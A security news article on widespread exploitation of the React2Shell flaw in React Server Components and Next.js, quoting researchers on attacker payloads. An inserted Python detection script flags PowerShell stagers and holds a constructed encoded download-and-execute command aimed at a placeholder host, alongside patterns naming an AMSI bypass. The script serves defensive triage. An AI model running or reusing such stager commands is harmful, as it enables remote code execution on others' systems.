Broad Exploit Activity Targets React2Shell Flaw
The vulnerability was disclosed publicly on Dec. 3 and researchers and threat intelligence teams immediately began seeing opportunistic and targeted exploitation attempts.

December 9, 2025 | 3 min read

UPDATE--A wide variety of threat actors are targeting the recently disclosed React2Shell vulnerability (CVE-2025-55182) in React Server Components and Next.js, with both opportunistic cybercriminals and more deliberate APT groups involved in the exploitation campaigns.
The vulnerability was disclosed publicly on Dec. 3 and researchers and threat intelligence teams immediately began seeing opportunistic and targeted exploitation attempts hitting organizations around the world. There are multiple public PoC exploits available, some of which researchers say are invalid. But the attack activity ramped up in recent days, and data from the Shadowserver Foundation shows hundreds of compromised hosts around the world. Censys data reveals more than 250,000 hosts exposed to the internet that are running vulnerable versions of these libraries.
GreyNoise, which monitors exploit activity across the internet, is also tracking some attackers that are adding exploits for React2Shell to Mirai botnets.
“Our traffic shows a familiar modern pattern, with attackers using a mix of fresh and legacy infrastructure to orchestrate their campaigns. The HTTP client and TCP stack fingerprints are overwhelmingly automation-heavy, not organic browsing. There's also an early focus on just this vulnerability, but we've already detected a slow migration of this CVE being added to Mirai and other botnet exploitation kits,” Bob Rudis of GreyNoise said in an analysis of the exploit activity.
“The initial access attempts are using the publicly disclosed proof-of-concept code as a base, and stage-1 payloads performing proof-of-execution (PoE) probes (e.g., PowerShell arithmetic) to validate RCE cheaply and using coded PowerShell download-and-execute stagers (-enc + DownloadString + IEX). Then, a stage-2 payload that uses reflection to set System.Management.Automation.AmsiUtils.amsiInitFailed = true (standard AMSI bypass), then iex executes the next stage.”
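The stager traits in that analysis can be turned into a triage check over process-creation telemetry. The Python below is an added example, not code from GreyNoise, VulnCheck or the article. The event fields (`parent`, `cmdline`), the indicator names and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Indicators named in the GreyNoise analysis quoted above.
INDICATORS = {
    "download_cradle": re.compile(r"downloadstring", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "amsi_bypass": re.compile(r"amsiutils|amsiinitfailed", re.I),
    "arithmetic_probe": re.compile(r"^\s*\d+\s*[-+*/]\s*\d+\s*$"),
}
# A flag followed by its value; the value may be quoted and never starts with "-".
FLAG = re.compile(r'\s-(\w+)\s+("[^"]*"|[^\s-]\S*)')

def script_text(cmdline):
    """Return (script, was_encoded) for a PowerShell command line, else (None, False)."""
    if not re.search(r"\b(?:powershell|pwsh)(?:\.exe)?\b", cmdline, re.I):
        return None, False
    for name, value in FLAG.findall(cmdline):
        name, value = name.lower(), value.strip('"')
        # PowerShell accepts -e, -ec and any longer prefix of -EncodedCommand.
        if name == "ec" or "encodedcommand".startswith(name):
            try:  # -EncodedCommand carries base64 of UTF-16LE text
                return base64.b64decode(value, validate=True).decode("utf-16-le"), True
            except ValueError:
                return "", True  # undecodable, but the flag itself is a signal
        if "command".startswith(name):
            return value, False
    return None, False

def triage(event):
    """Return sorted indicator names for one event; a Node.js parent is noted
    because it fits the child_process execution path VulnCheck describes."""
    script, encoded = script_text(event["cmdline"])
    if script is None:
        return []
    hits = [n for n, rx in INDICATORS.items() if rx.search(script)]
    hits += ["encoded_command"] if encoded else []
    if hits and re.search(r"\bnode(?:\.exe)?$", event["parent"], re.I):
        hits.append("node_parent")
    return sorted(hits)

def enc(script):  # builds constructed samples: base64 of UTF-16LE
    return base64.b64encode(script.encode("utf-16-le")).decode()

NODE = r"C:\Program Files\nodejs\node.exe"  # constructed parent image path
SAMPLES = [  # constructed events; the URL is a placeholder
    {"parent": NODE, "cmdline": 'powershell -c "41*271"'},
    {"parent": NODE, "cmdline": "powershell.exe -nop -w hidden -enc "
     + enc("IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s')")},
]
```

Decoding the `-enc` argument before matching is the step that matters here: the download and execution keywords never appear in the raw command line.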
The React2Shell vulnerability is a critical, trivially exploitable RCE flaw in many versions of both React Server Components and Next.js. The flaw also has broader effects on downstream libraries and apps that implement RSC.
“This matters operationally because RSC is a high-value target since it sits in front of application logic that often runs with production permissions. Thanks to services such as BuiltWith/Wappalyzer, the exposed services are easy to find and exploit at scale. Early waves tend to be broad and shallow, featuring opportunistic scanning, validation payloads, and commodity post-exploitation stagers,” GreyNoise’s Rudis said.
It's interesting to note that much of the attack activity in the immediate aftermath of the disclosure was relatively basic and simple for organizations to identify. That's evolved somewhat, and there are now many more PoCs available and some different payloads, as well. VulnCheck researchers have identified several different payloads and attack paths used in recent days, and also have released their own artifacts, including a webshell and exploit information.
“Initial execution-based exploits are the simplest and were the most common immediately following the publication of the first valid PoCs. These often had a similar structure to the maple3142 PoC in that they simply call the NodeJS process and require modules to directly access child_process or similar OS command execution payloads. These can be used to call reverse shells or reach simple OS command sinks that are extremely common in logic exploitation bugs,” Cale Black of VulnCheck said in a post.
Fixed versions of RSC and Next.js are available to address the vulnerability. Organizations that haven’t already deployed patched versions should do so as quickly as possible, especially in light of the widespread exploit activity.
This story was updated on Dec. 9 to include information from VulnCheck.
Dennis Fisher is an award-winning journalist and author. He is one of the co-founders of Decipher and Threatpost and has been writing about cybersecurity since 2000. Dennis enjoys finding the stories behind the headlines and digging into the motivations and thinking of both defenders and attackers. He is the author of 2.5 novels and once met Shaq. Contact: dennis at decipher.sc.